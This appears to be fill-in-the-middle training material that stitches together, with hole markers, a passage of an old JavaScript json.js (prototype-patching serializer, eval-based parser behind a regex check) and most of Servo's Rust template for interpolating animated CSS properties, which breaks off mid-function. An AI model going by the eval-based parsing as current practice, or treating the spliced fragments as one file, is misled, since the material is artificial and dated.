This method produces a JSON text from an object. The
object must not contain any cyclical references.
array.toJSONString()
This method produces a JSON text from an array. The
array must not contain any cyclical references.
string.parseJSON()
This method parses a JSON text to produce an object or
array. It will return false if there is an error.
It is expected that these methods will formally become part of the
JavaScript Programming Language in the Fourth Edition of the
ECMAScript standard.
*/
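// Usage sketch (illustrative):
//
//   ({a: [1, true, null]}).toJSONString();  // '{"a":[1,true,null]}'
//   '{"a": 1}'.parseJSON();                 // {a: 1}
//   '{not json'.parseJSON();                // false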
(function () {
var m = {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
},
s = {
array: function (x) {
var a = ['['], b, f, i, l = x.length, v;
for (i = 0; i < l; i += 1) {
v = x[i];
f = s[typeof v];
if (f) {
v = f(v);
if (typeof v == 'string') {
if (b) {
a[a.length] = ',';
}
a[a.length] = v;
b = true;
}
}
}
a[a.length] = ']';
return a.join('');
},
'boolean': function (x) {
return String(x);
},
'null': function (x) {
return "null";
},
number: function (x) {
return isFinite(x) ? String(x) : 'null';
},
object: function (x) {
if (x) {
if (x instanceof Array) {
return s.array(x);
}
var a = ['{'], b, f, i, v;
for (i in x) {
v = x[i];
f = s[typeof v];<|fim▁hole|> a[a.length] = ',';
}
a.push(s.string(i), ':', v);
b = true;
}
}
}
a[a.length] = '}';
return a.join('');
}
return 'null';
},
string: function (x) {
if (/["\\\x00-\x1f]/.test(x)) {
x = x.replace(/([\x00-\x1f\\"])/g, function(a, b) {
var c = m[b];
if (c) {
return c;
}
c = b.charCodeAt();
return '\\u00' +
Math.floor(c / 16).toString(16) +
(c % 16).toString(16);
});
}
return '"' + x + '"';
}
};
Object.prototype.toJSONString = function () {
return s.object(this);
};
Array.prototype.toJSONString = function () {
return s.array(this);
};
})();
String.prototype.parseJSON = function () {
try {
return (/^("(\\.|[^"\\\n\r])*?"|[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t])+?$/.test(this)) &&
eval('(' + this + ')');
} catch (e) {
return false;
}
};<|fim▁end|> | if (f) {
v = f(v);
if (typeof v == 'string') {
if (b) { |
<|file_name|>animated_properties.mako.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use app_units::Au;
use cssparser::{Color as CSSParserColor, Parser, RGBA};
use euclid::{Point2D, Size2D};
use properties::{DeclaredValue, PropertyDeclaration};
use properties::longhands;
use properties::longhands::background_position_x::computed_value::T as BackgroundPositionX;
use properties::longhands::background_position_y::computed_value::T as BackgroundPositionY;
use properties::longhands::background_size::computed_value::T as BackgroundSize;
use properties::longhands::font_weight::computed_value::T as FontWeight;
use properties::longhands::line_height::computed_value::T as LineHeight;
use properties::longhands::text_shadow::computed_value::T as TextShadowList;
use properties::longhands::text_shadow::computed_value::TextShadow;
use properties::longhands::box_shadow::computed_value::T as BoxShadowList;
use properties::longhands::box_shadow::single_value::computed_value::T as BoxShadow;
use properties::longhands::vertical_align::computed_value::T as VerticalAlign;
use properties::longhands::visibility::computed_value::T as Visibility;
use properties::longhands::z_index::computed_value::T as ZIndex;
use std::cmp;
use std::fmt;
use style_traits::ToCss;
use super::ComputedValues;
use values::Either;
use values::computed::{Angle, LengthOrPercentageOrAuto, LengthOrPercentageOrNone};
use values::computed::{BorderRadiusSize, LengthOrNone};
use values::computed::{CalcLengthOrPercentage, Context, LengthOrPercentage};
use values::computed::position::{HorizontalPosition, Position, VerticalPosition};
use values::computed::ToComputedValue;
/// A given transition property, that is either `All`, or an animatable
/// property.
// NB: This needs to be here because it needs all the longhands generated
// beforehand.
#[derive(Copy, Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum TransitionProperty {
/// All, any animatable property changing should generate a transition.
All,
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case},
% endif
% endfor
}
impl TransitionProperty {
/// Iterates over each property that is not `All`.
pub fn each<F: FnMut(TransitionProperty) -> ()>(mut cb: F) {
% for prop in data.longhands:
% if prop.animatable:
cb(TransitionProperty::${prop.camel_case});
% endif
% endfor
}
/// Parse a transition-property value.
pub fn parse(input: &mut Parser) -> Result<Self, ()> {
match_ignore_ascii_case! { try!(input.expect_ident()),
"all" => Ok(TransitionProperty::All),
% for prop in data.longhands:
% if prop.animatable:
"${prop.name}" => Ok(TransitionProperty::${prop.camel_case}),
% endif
% endfor
_ => Err(())
}
}
/// Get a transition property from a property declaration.
pub fn from_declaration(declaration: &PropertyDeclaration) -> Option<Self> {
match *declaration {
% for prop in data.longhands:
% if prop.animatable:
PropertyDeclaration::${prop.camel_case}(..)
=> Some(TransitionProperty::${prop.camel_case}),
% endif
% endfor
_ => None,
}
}
}
impl ToCss for TransitionProperty {
fn to_css<W>(&self, dest: &mut W) -> fmt::Result
where W: fmt::Write,
{
match *self {
TransitionProperty::All => dest.write_str("all"),
% for prop in data.longhands:
% if prop.animatable:
TransitionProperty::${prop.camel_case} => dest.write_str("${prop.name}"),
% endif
% endfor
}
}
}
/// An animated property interpolation between two computed values for that
/// property.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum AnimatedProperty {
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case}(longhands::${prop.ident}::computed_value::T,
longhands::${prop.ident}::computed_value::T),
% endif
% endfor
}
impl AnimatedProperty {
/// Get the name of this property.
pub fn name(&self) -> &'static str {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(..) => "${prop.name}",
% endif
% endfor
}
}
/// Whether this interpolation does animate, that is, whether the start and
/// end values are different.
pub fn does_animate(&self) -> bool {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(ref from, ref to) => from != to,
% endif
% endfor
}
}
/// Whether an animated property has the same end value as another.
pub fn has_the_same_end_value_as(&self, other: &Self) -> bool {
match (self, other) {
% for prop in data.longhands:
% if prop.animatable:
(&AnimatedProperty::${prop.camel_case}(_, ref this_end_value),
&AnimatedProperty::${prop.camel_case}(_, ref other_end_value)) => {
this_end_value == other_end_value
}
% endif
% endfor
_ => false,
}
}
/// Update `style` with the proper computed style corresponding to this
/// animation at `progress`.
pub fn update(&self, style: &mut ComputedValues, progress: f64) {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(ref from, ref to) => {
if let Ok(value) = from.interpolate(to, progress) {
style.mutate_${prop.style_struct.ident.strip("_")}().set_${prop.ident}(value);
}
}
% endif
% endfor
}
}
/// Get an animatable value from a transition-property, an old style, and a
/// new style.
pub fn from_transition_property(transition_property: &TransitionProperty,
old_style: &ComputedValues,
new_style: &ComputedValues)
-> AnimatedProperty {
match *transition_property {
TransitionProperty::All => panic!("Can't use TransitionProperty::All here."),
% for prop in data.longhands:
% if prop.animatable:
TransitionProperty::${prop.camel_case} => {
AnimatedProperty::${prop.camel_case}(
old_style.get_${prop.style_struct.ident.strip("_")}().clone_${prop.ident}(),
new_style.get_${prop.style_struct.ident.strip("_")}().clone_${prop.ident}())
}
% endif
% endfor
}
}
}
% if product == "gecko":
use gecko_bindings::structs::RawServoAnimationValue;
use gecko_bindings::sugar::ownership::{HasArcFFI, HasFFI};
unsafe impl HasFFI for AnimationValue {
type FFIType = RawServoAnimationValue;
}
unsafe impl HasArcFFI for AnimationValue {}
% endif
/// An enum to represent a single computed value belonging to an animated
/// property in order to be interpolated with another one. When interpolating,
/// both values need to belong to the same property.
///
/// This is different to AnimatedProperty in the sense that AnimatedProperty
/// also knows the final value to be used during the animation.
///
/// This is to be used in Gecko integration code.
///
/// FIXME: We need to add a path for custom properties, but that's trivial after
/// this (it follows a similar path to that of PropertyDeclaration).
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum AnimationValue {
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case}(longhands::${prop.ident}::computed_value::T),
% endif
% endfor
}
impl AnimationValue {
/// "Uncompute" this animation value in order to be used inside the CSS
/// cascade.
pub fn uncompute(&self) -> PropertyDeclaration {
use properties::{longhands, DeclaredValue};
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimationValue::${prop.camel_case}(ref from) => {
PropertyDeclaration::${prop.camel_case}(
DeclaredValue::Value(
longhands::${prop.ident}::SpecifiedValue::from_computed_value(from)))
}
% endif
% endfor
}
}
/// Construct an AnimationValue from a property declaration
pub fn from_declaration(decl: &PropertyDeclaration, context: &Context, initial: &ComputedValues) -> Option<Self> {
match *decl {
% for prop in data.longhands:
% if prop.animatable:
PropertyDeclaration::${prop.camel_case}(ref val) => {
let computed = match *val {
// https://bugzilla.mozilla.org/show_bug.cgi?id=1326131
DeclaredValue::WithVariables{..} => unimplemented!(),
DeclaredValue::Value(ref val) => val.to_computed_value(context),
% if not prop.style_struct.inherited:
DeclaredValue::Unset |
% endif
DeclaredValue::Initial => {
let initial_struct = initial.get_${prop.style_struct.name_lower}();
initial_struct.clone_${prop.ident}()
},
% if prop.style_struct.inherited:
DeclaredValue::Unset |
% endif
DeclaredValue::Inherit => {
let inherit_struct = context.inherited_style
.get_${prop.style_struct.name_lower}();
inherit_struct.clone_${prop.ident}()
},
};
Some(AnimationValue::${prop.camel_case}(computed))
}
% endif
% endfor
_ => None // Non-animatable properties can reach here via shorthands; ignore them.
}
}
}
impl Interpolate for AnimationValue {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (self, other) {
% for prop in data.longhands:
% if prop.animatable:
(&AnimationValue::${prop.camel_case}(ref from),
&AnimationValue::${prop.camel_case}(ref to)) => {
from.interpolate(to, progress).map(AnimationValue::${prop.camel_case})
}
% endif
% endfor
_ => {
panic!("Expected interpolation of computed values of the same \
property, got: {:?}, {:?}", self, other);
}
}
}
}
/// A trait used to implement [interpolation][interpolated-types].
///
/// [interpolated-types]: https://drafts.csswg.org/css-transitions/#interpolated-types
pub trait Interpolate: Sized {
/// Interpolate a value with another for a given property.
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()>;
}
/// https://drafts.csswg.org/css-transitions/#animtype-repeatable-list
pub trait RepeatableListInterpolate: Interpolate {}
impl<T: RepeatableListInterpolate> Interpolate for Vec<T> {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
use num_integer::lcm;
let len = lcm(self.len(), other.len());
self.iter().cycle().zip(other.iter().cycle()).take(len).map(|(me, you)| {
me.interpolate(you, progress)
}).collect()
}
}
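// Illustrative note: two repeatable lists of lengths 2 and 3 interpolate over
// lcm(2, 3) = 6 output items, cycling each input, so the pairs used are
// (a0,b0), (a1,b1), (a0,b2), (a1,b0), (a0,b1), (a1,b2).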
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for Au {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Au((self.0 as f64 + (other.0 as f64 - self.0 as f64) * progress).round() as i32))
}
}
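// Worked example (illustration only): interpolating app units half-way,
// `Au(0).interpolate(&Au(100), 0.5)`, yields `Ok(Au(50))`; the fractional
// result is rounded before truncating back to i32.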
impl <T> Interpolate for Option<T>
where T: Interpolate,
{
#[inline]
fn interpolate(&self, other: &Option<T>, progress: f64) -> Result<Option<T>, ()> {
match (self, other) {
(&Some(ref this), &Some(ref other)) => {
Ok(this.interpolate(other, progress).ok())
}
_ => Err(()),
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for f32 {
#[inline]
fn interpolate(&self, other: &f32, progress: f64) -> Result<Self, ()> {
Ok(((*self as f64) + ((*other as f64) - (*self as f64)) * progress) as f32)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for f64 {
#[inline]
fn interpolate(&self, other: &f64, progress: f64) -> Result<Self, ()> {
Ok(*self + (*other - *self) * progress)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for i32 {
#[inline]
fn interpolate(&self, other: &i32, progress: f64) -> Result<Self, ()> {
let a = *self as f64;
let b = *other as f64;
Ok((a + (b - a) * progress).round() as i32)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for Angle {
#[inline]
fn interpolate(&self, other: &Angle, progress: f64) -> Result<Self, ()> {
self.radians().interpolate(&other.radians(), progress).map(Angle)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-visibility
impl Interpolate for Visibility {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(Visibility::visible, _) | (_, Visibility::visible) => {
Ok(if progress >= 0.0 && progress <= 1.0 {
Visibility::visible
} else if progress < 0.0 {
*self
} else {
*other
})
}
_ => Err(()),
}
}
}
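// Illustrative consequence of the rule above: `hidden -> visible` (or the
// reverse) snaps to `visible` for every progress in [0, 1], so the element
// stays visible for the whole transition; `hidden -> collapse` returns Err(()).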
/// https://drafts.csswg.org/css-transitions/#animtype-integer
impl Interpolate for ZIndex {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(ZIndex::Number(ref this),
ZIndex::Number(ref other)) => {
this.interpolate(other, progress).map(ZIndex::Number)
}
_ => Err(()),
}
}
}
impl<T: Interpolate + Copy> Interpolate for Size2D<T> {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let width = try!(self.width.interpolate(&other.width, progress));
let height = try!(self.height.interpolate(&other.height, progress));
Ok(Size2D::new(width, height))
}
}
impl<T: Interpolate + Copy> Interpolate for Point2D<T> {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let x = try!(self.x.interpolate(&other.x, progress));
let y = try!(self.y.interpolate(&other.y, progress));
Ok(Point2D::new(x, y))
}
}
impl Interpolate for BorderRadiusSize {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
self.0.interpolate(&other.0, progress).map(BorderRadiusSize)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-length
impl Interpolate for VerticalAlign {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(ref this)),
VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(ref other))) => {
this.interpolate(other, progress).map(|value| {
VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(value))
})
}
_ => Err(()),
}
}
}
impl Interpolate for BackgroundSize {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
self.0.interpolate(&other.0, progress).map(BackgroundSize)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-color
impl Interpolate for RGBA {
#[inline]
fn interpolate(&self, other: &RGBA, progress: f64) -> Result<Self, ()> {
fn clamp(val: f32) -> f32 {
val.max(0.).min(1.)
}
let alpha = clamp(try!(self.alpha.interpolate(&other.alpha, progress)));
if alpha == 0. {
Ok(RGBA { red: 0., green: 0., blue: 0., alpha: 0. })
} else {
Ok(RGBA { red: clamp(try!((self.red * self.alpha).interpolate(&(other.red * other.alpha), progress))
* 1. / alpha),
green: clamp(try!((self.green * self.alpha).interpolate(&(other.green * other.alpha), progress))
* 1. / alpha),
blue: clamp(try!((self.blue * self.alpha).interpolate(&(other.blue * other.alpha), progress))
* 1. / alpha),
alpha: alpha
})
}
}
}
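// Worked example (illustrative values): interpolating opaque red
// RGBA(1, 0, 0, 1) with half-transparent blue RGBA(0, 0, 1, 0.5) at
// progress 0.5 premultiplies each channel by its alpha first:
//   alpha = (1.0 + 0.5) / 2                 = 0.75
//   red   = (1.0*1.0 + 0.0*0.5) / 2 / 0.75 ≈ 0.667
//   blue  = (0.0*1.0 + 1.0*0.5) / 2 / 0.75 ≈ 0.333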
/// https://drafts.csswg.org/css-transitions/#animtype-color
impl Interpolate for CSSParserColor {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(CSSParserColor::RGBA(ref this), CSSParserColor::RGBA(ref other)) => {
this.interpolate(other, progress).map(CSSParserColor::RGBA)
}
_ => Err(()),
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for CalcLengthOrPercentage {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
fn interpolate_half<T>(this: Option<T>,
other: Option<T>,
progress: f64)
-> Result<Option<T>, ()>
where T: Default + Interpolate,
{
match (this, other) {
(None, None) => Ok(None),
(this, other) => {
let this = this.unwrap_or(T::default());
let other = other.unwrap_or(T::default());
this.interpolate(&other, progress).map(Some)
}
}
}
Ok(CalcLengthOrPercentage {
length: try!(self.length.interpolate(&other.length, progress)),
percentage: try!(interpolate_half(self.percentage, other.percentage, progress)),
})
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentage {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentage::Length(ref this),
LengthOrPercentage::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentage::Length)
}
(LengthOrPercentage::Percentage(ref this),
LengthOrPercentage::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentage::Percentage)
}
(this, other) => {
let this: CalcLengthOrPercentage = From::from(this);
let other: CalcLengthOrPercentage = From::from(other);
this.interpolate(&other, progress)
.map(LengthOrPercentage::Calc)
}
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentageOrAuto {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentageOrAuto::Length(ref this),
LengthOrPercentageOrAuto::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrAuto::Length)
}
(LengthOrPercentageOrAuto::Percentage(ref this),
LengthOrPercentageOrAuto::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrAuto::Percentage)
}
(LengthOrPercentageOrAuto::Auto, LengthOrPercentageOrAuto::Auto) => {
Ok(LengthOrPercentageOrAuto::Auto)
}
(this, other) => {
let this: Option<CalcLengthOrPercentage> = From::from(this);
let other: Option<CalcLengthOrPercentage> = From::from(other);
match this.interpolate(&other, progress) {
Ok(Some(result)) => Ok(LengthOrPercentageOrAuto::Calc(result)),
_ => Err(()),
}
}
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentageOrNone {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentageOrNone::Length(ref this),
LengthOrPercentageOrNone::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrNone::Length)
}
(LengthOrPercentageOrNone::Percentage(ref this),
LengthOrPercentageOrNone::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrNone::Percentage)
}
(LengthOrPercentageOrNone::None, LengthOrPercentageOrNone::None) => {
Ok(LengthOrPercentageOrNone::None)
}
_ => Err(())
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
/// https://drafts.csswg.org/css-transitions/#animtype-length
impl Interpolate for LineHeight {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LineHeight::Length(ref this),
LineHeight::Length(ref other)) => {
this.interpolate(other, progress).map(LineHeight::Length)
}
(LineHeight::Number(ref this),
LineHeight::Number(ref other)) => {
this.interpolate(other, progress).map(LineHeight::Number)
}
(LineHeight::Normal, LineHeight::Normal) => {
Ok(LineHeight::Normal)
}
_ => Err(()),
}
}
}
/// http://dev.w3.org/csswg/css-transitions/#animtype-font-weight
impl Interpolate for FontWeight {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let a = (*self as u32) as f64;
let b = (*other as u32) as f64;
let weight = a + (b - a) * progress;
Ok(if weight < 150. {
FontWeight::Weight100
} else if weight < 250. {
FontWeight::Weight200
} else if weight < 350. {
FontWeight::Weight300
} else if weight < 450. {
FontWeight::Weight400
} else if weight < 550. {
FontWeight::Weight500
} else if weight < 650. {
FontWeight::Weight600
} else if weight < 750. {
FontWeight::Weight700
} else if weight < 850. {
FontWeight::Weight800
} else {
FontWeight::Weight900
})
}
}
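// Worked example of the bucketing above (illustrative, not from the source):
// interpolating Weight400 toward Weight700 at progress 0.5 gives
// 400.0 + (700.0 - 400.0) * 0.5 = 550.0, which falls in the [550, 650)
// bucket and therefore snaps to FontWeight::Weight600.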
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for Position {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Position {
horizontal: try!(self.horizontal.interpolate(&other.horizontal, progress)),
vertical: try!(self.vertical.interpolate(&other.vertical, progress)),
})
}
}
impl RepeatableListInterpolate for Position {}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for HorizontalPosition {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(HorizontalPosition(try!(self.0.interpolate(&other.0, progress))))
}
}
impl RepeatableListInterpolate for HorizontalPosition {}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for VerticalPosition {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(VerticalPosition(try!(self.0.interpolate(&other.0, progress))))
}
}
impl RepeatableListInterpolate for VerticalPosition {}
impl Interpolate for BackgroundPositionX {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(BackgroundPositionX(try!(self.0.interpolate(&other.0, progress))))
}
}
impl Interpolate for BackgroundPositionY {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(BackgroundPositionY(try!(self.0.interpolate(&other.0, progress))))
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for TextShadow {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(TextShadow {
offset_x: try!(self.offset_x.interpolate(&other.offset_x, progress)),
offset_y: try!(self.offset_y.interpolate(&other.offset_y, progress)),
blur_radius: try!(self.blur_radius.interpolate(&other.blur_radius, progress)),
color: try!(self.color.interpolate(&other.color, progress)),
})
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for TextShadowList {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let zero = TextShadow {
offset_x: Au(0),
offset_y: Au(0),
blur_radius: Au(0),
color: CSSParserColor::RGBA(RGBA {
red: 0.0, green: 0.0, blue: 0.0, alpha: 0.0
})
};
let max_len = cmp::max(self.0.len(), other.0.len());
let mut result = Vec::with_capacity(max_len);
for i in 0..max_len {
let shadow = match (self.0.get(i), other.0.get(i)) {
(Some(shadow), Some(other))
=> try!(shadow.interpolate(other, progress)),
(Some(shadow), None) => {
shadow.interpolate(&zero, progress).unwrap()
}
(None, Some(shadow)) => {
zero.interpolate(&shadow, progress).unwrap()
}
(None, None) => unreachable!(),
};
result.push(shadow);
}
Ok(TextShadowList(result))
}
}
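// Illustrative note on the padding above: interpolating a two-shadow list
// with a one-shadow list pairs the extra shadow with `zero`, so it fades
// toward a fully transparent shadow at the origin instead of failing the
// interpolation outright.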
impl Interpolate for BoxShadowList {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
        // The zero shadow is mutable so that its `inset` flag can be made to
        // match whichever real shadow it is paired with below; interpolating
        // an inset shadow with an outset one would fail.
let mut zero = BoxShadow {
offset_x: Au(0),
offset_y: Au(0),
spread_radius: Au(0),
blur_radius: Au(0),
color: CSSParserColor::RGBA(RGBA {
red: 0.0, green: 0.0, blue: 0.0, alpha: 0.0
}),
inset: false,
};
let max_len = cmp::max(self.0.len(), other.0.len());
let mut result = Vec::with_capacity(max_len);
for i in 0..max_len {
let shadow = match (self.0.get(i), other.0.get(i)) {
(Some(shadow), Some(other))
=> try!(shadow.interpolate(other, progress)),
(Some(shadow), None) => {
zero.inset = shadow.inset;
shadow.interpolate(&zero, progress).unwrap()
}
(None, Some(shadow)) => {
zero.inset = shadow.inset;
zero.interpolate(&shadow, progress).unwrap()
}
(None, None) => unreachable!(),
};
result.push(shadow);
}
Ok(BoxShadowList(result))
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for BoxShadow {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
if self.inset != other.inset {
return Err(());
}
let x = try!(self.offset_x.interpolate(&other.offset_x, progress));
let y = try!(self.offset_y.interpolate(&other.offset_y, progress));
let color = try!(self.color.interpolate(&other.color, progress));
let spread = try!(self.spread_radius.interpolate(&other.spread_radius, progress));
let blur = try!(self.blur_radius.interpolate(&other.blur_radius, progress));
Ok(BoxShadow {
offset_x: x,
offset_y: y,
blur_radius: blur,
spread_radius: spread,
color: color,
inset: self.inset,
})
}
}
impl Interpolate for LengthOrNone {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(Either::First(ref length), Either::First(ref other)) =>
length.interpolate(&other, progress).map(Either::First),
_ => Err(()),
}
}
}
% if product == "servo":
use properties::longhands::transform::computed_value::ComputedMatrix;
use properties::longhands::transform::computed_value::ComputedOperation as TransformOperation;
use properties::longhands::transform::computed_value::T as TransformList;
use values::CSSFloat;
use values::specified::Angle as SpecifiedAngle;
/// Check if it's possible to do a direct numerical interpolation
/// between these two transform lists.
/// http://dev.w3.org/csswg/css-transforms/#transform-transform-animation
fn can_interpolate_list(from_list: &[TransformOperation],
to_list: &[TransformOperation]) -> bool {
    // The two lists must be the same length.
if from_list.len() != to_list.len() {
return false;
}
    // Each transform operation must match the primitive type of its
    // counterpart in the other list.
for (from, to) in from_list.iter().zip(to_list) {
match (from, to) {
(&TransformOperation::Matrix(..), &TransformOperation::Matrix(..)) |
(&TransformOperation::Skew(..), &TransformOperation::Skew(..)) |
(&TransformOperation::Translate(..), &TransformOperation::Translate(..)) |
(&TransformOperation::Scale(..), &TransformOperation::Scale(..)) |
(&TransformOperation::Rotate(..), &TransformOperation::Rotate(..)) |
(&TransformOperation::Perspective(..), &TransformOperation::Perspective(..)) => {}
_ => {
return false;
}
}
}
true
}
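// For example (illustrative): a `translate(...) scale(...)` list can be
// interpolated numerically with another `translate(...) scale(...)` list,
// but not with `scale(...) translate(...)` -- the operation kinds must
// match pairwise.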
/// Build an equivalent 'identity transform function list' based
/// on an existing transform list.
/// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
fn build_identity_transform_list(list: &[TransformOperation]) -> Vec<TransformOperation> {
let mut result = vec!();
for operation in list {
match *operation {
TransformOperation::Matrix(..) => {
let identity = ComputedMatrix::identity();
result.push(TransformOperation::Matrix(identity));
}
TransformOperation::Skew(..) => {
result.push(TransformOperation::Skew(Angle(0.0), Angle(0.0)));
}
TransformOperation::Translate(..) => {
result.push(TransformOperation::Translate(LengthOrPercentage::zero(),
LengthOrPercentage::zero(),
Au(0)));
}
TransformOperation::Scale(..) => {
result.push(TransformOperation::Scale(1.0, 1.0, 1.0));
}
TransformOperation::Rotate(..) => {
result.push(TransformOperation::Rotate(0.0, 0.0, 1.0, Angle(0.0)));
}
TransformOperation::Perspective(..) => {
// http://dev.w3.org/csswg/css-transforms/#identity-transform-function
let identity = ComputedMatrix::identity();
result.push(TransformOperation::Matrix(identity));
}
}
}
result
}
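// Illustrative mapping: the list [Translate(10px, 0%, 0), Scale(2, 2, 1)]
// yields the identity list [Translate(0, 0%, 0), Scale(1, 1, 1)], which can
// then be interpolated pairwise against the original list.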
/// Interpolate two transform lists.
/// http://dev.w3.org/csswg/css-transforms/#interpolation-of-transforms
fn interpolate_transform_list(from_list: &[TransformOperation],
to_list: &[TransformOperation],
progress: f64) -> TransformList {
let mut result = vec![];
if can_interpolate_list(from_list, to_list) {
for (from, to) in from_list.iter().zip(to_list) {
match (from, to) {
                (&TransformOperation::Matrix(from),
                 &TransformOperation::Matrix(to)) => {
                    let interpolated = from.interpolate(&to, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
(&TransformOperation::Skew(fx, fy),
&TransformOperation::Skew(tx, ty)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();
result.push(TransformOperation::Skew(ix, iy));
}
(&TransformOperation::Translate(fx, fy, fz),
&TransformOperation::Translate(tx, ty, tz)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();<|fim▁hole|> }
(&TransformOperation::Scale(fx, fy, fz),
&TransformOperation::Scale(tx, ty, tz)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();
let iz = fz.interpolate(&tz, progress).unwrap();
result.push(TransformOperation::Scale(ix, iy, iz));
}
(&TransformOperation::Rotate(fx, fy, fz, fa),
&TransformOperation::Rotate(tx, ty, tz, ta)) => {
let norm_f = ((fx * fx) + (fy * fy) + (fz * fz)).sqrt();
let norm_t = ((tx * tx) + (ty * ty) + (tz * tz)).sqrt();
let (fx, fy, fz) = (fx / norm_f, fy / norm_f, fz / norm_f);
let (tx, ty, tz) = (tx / norm_t, ty / norm_t, tz / norm_t);
if fx == tx && fy == ty && fz == tz {
let ia = fa.interpolate(&ta, progress).unwrap();
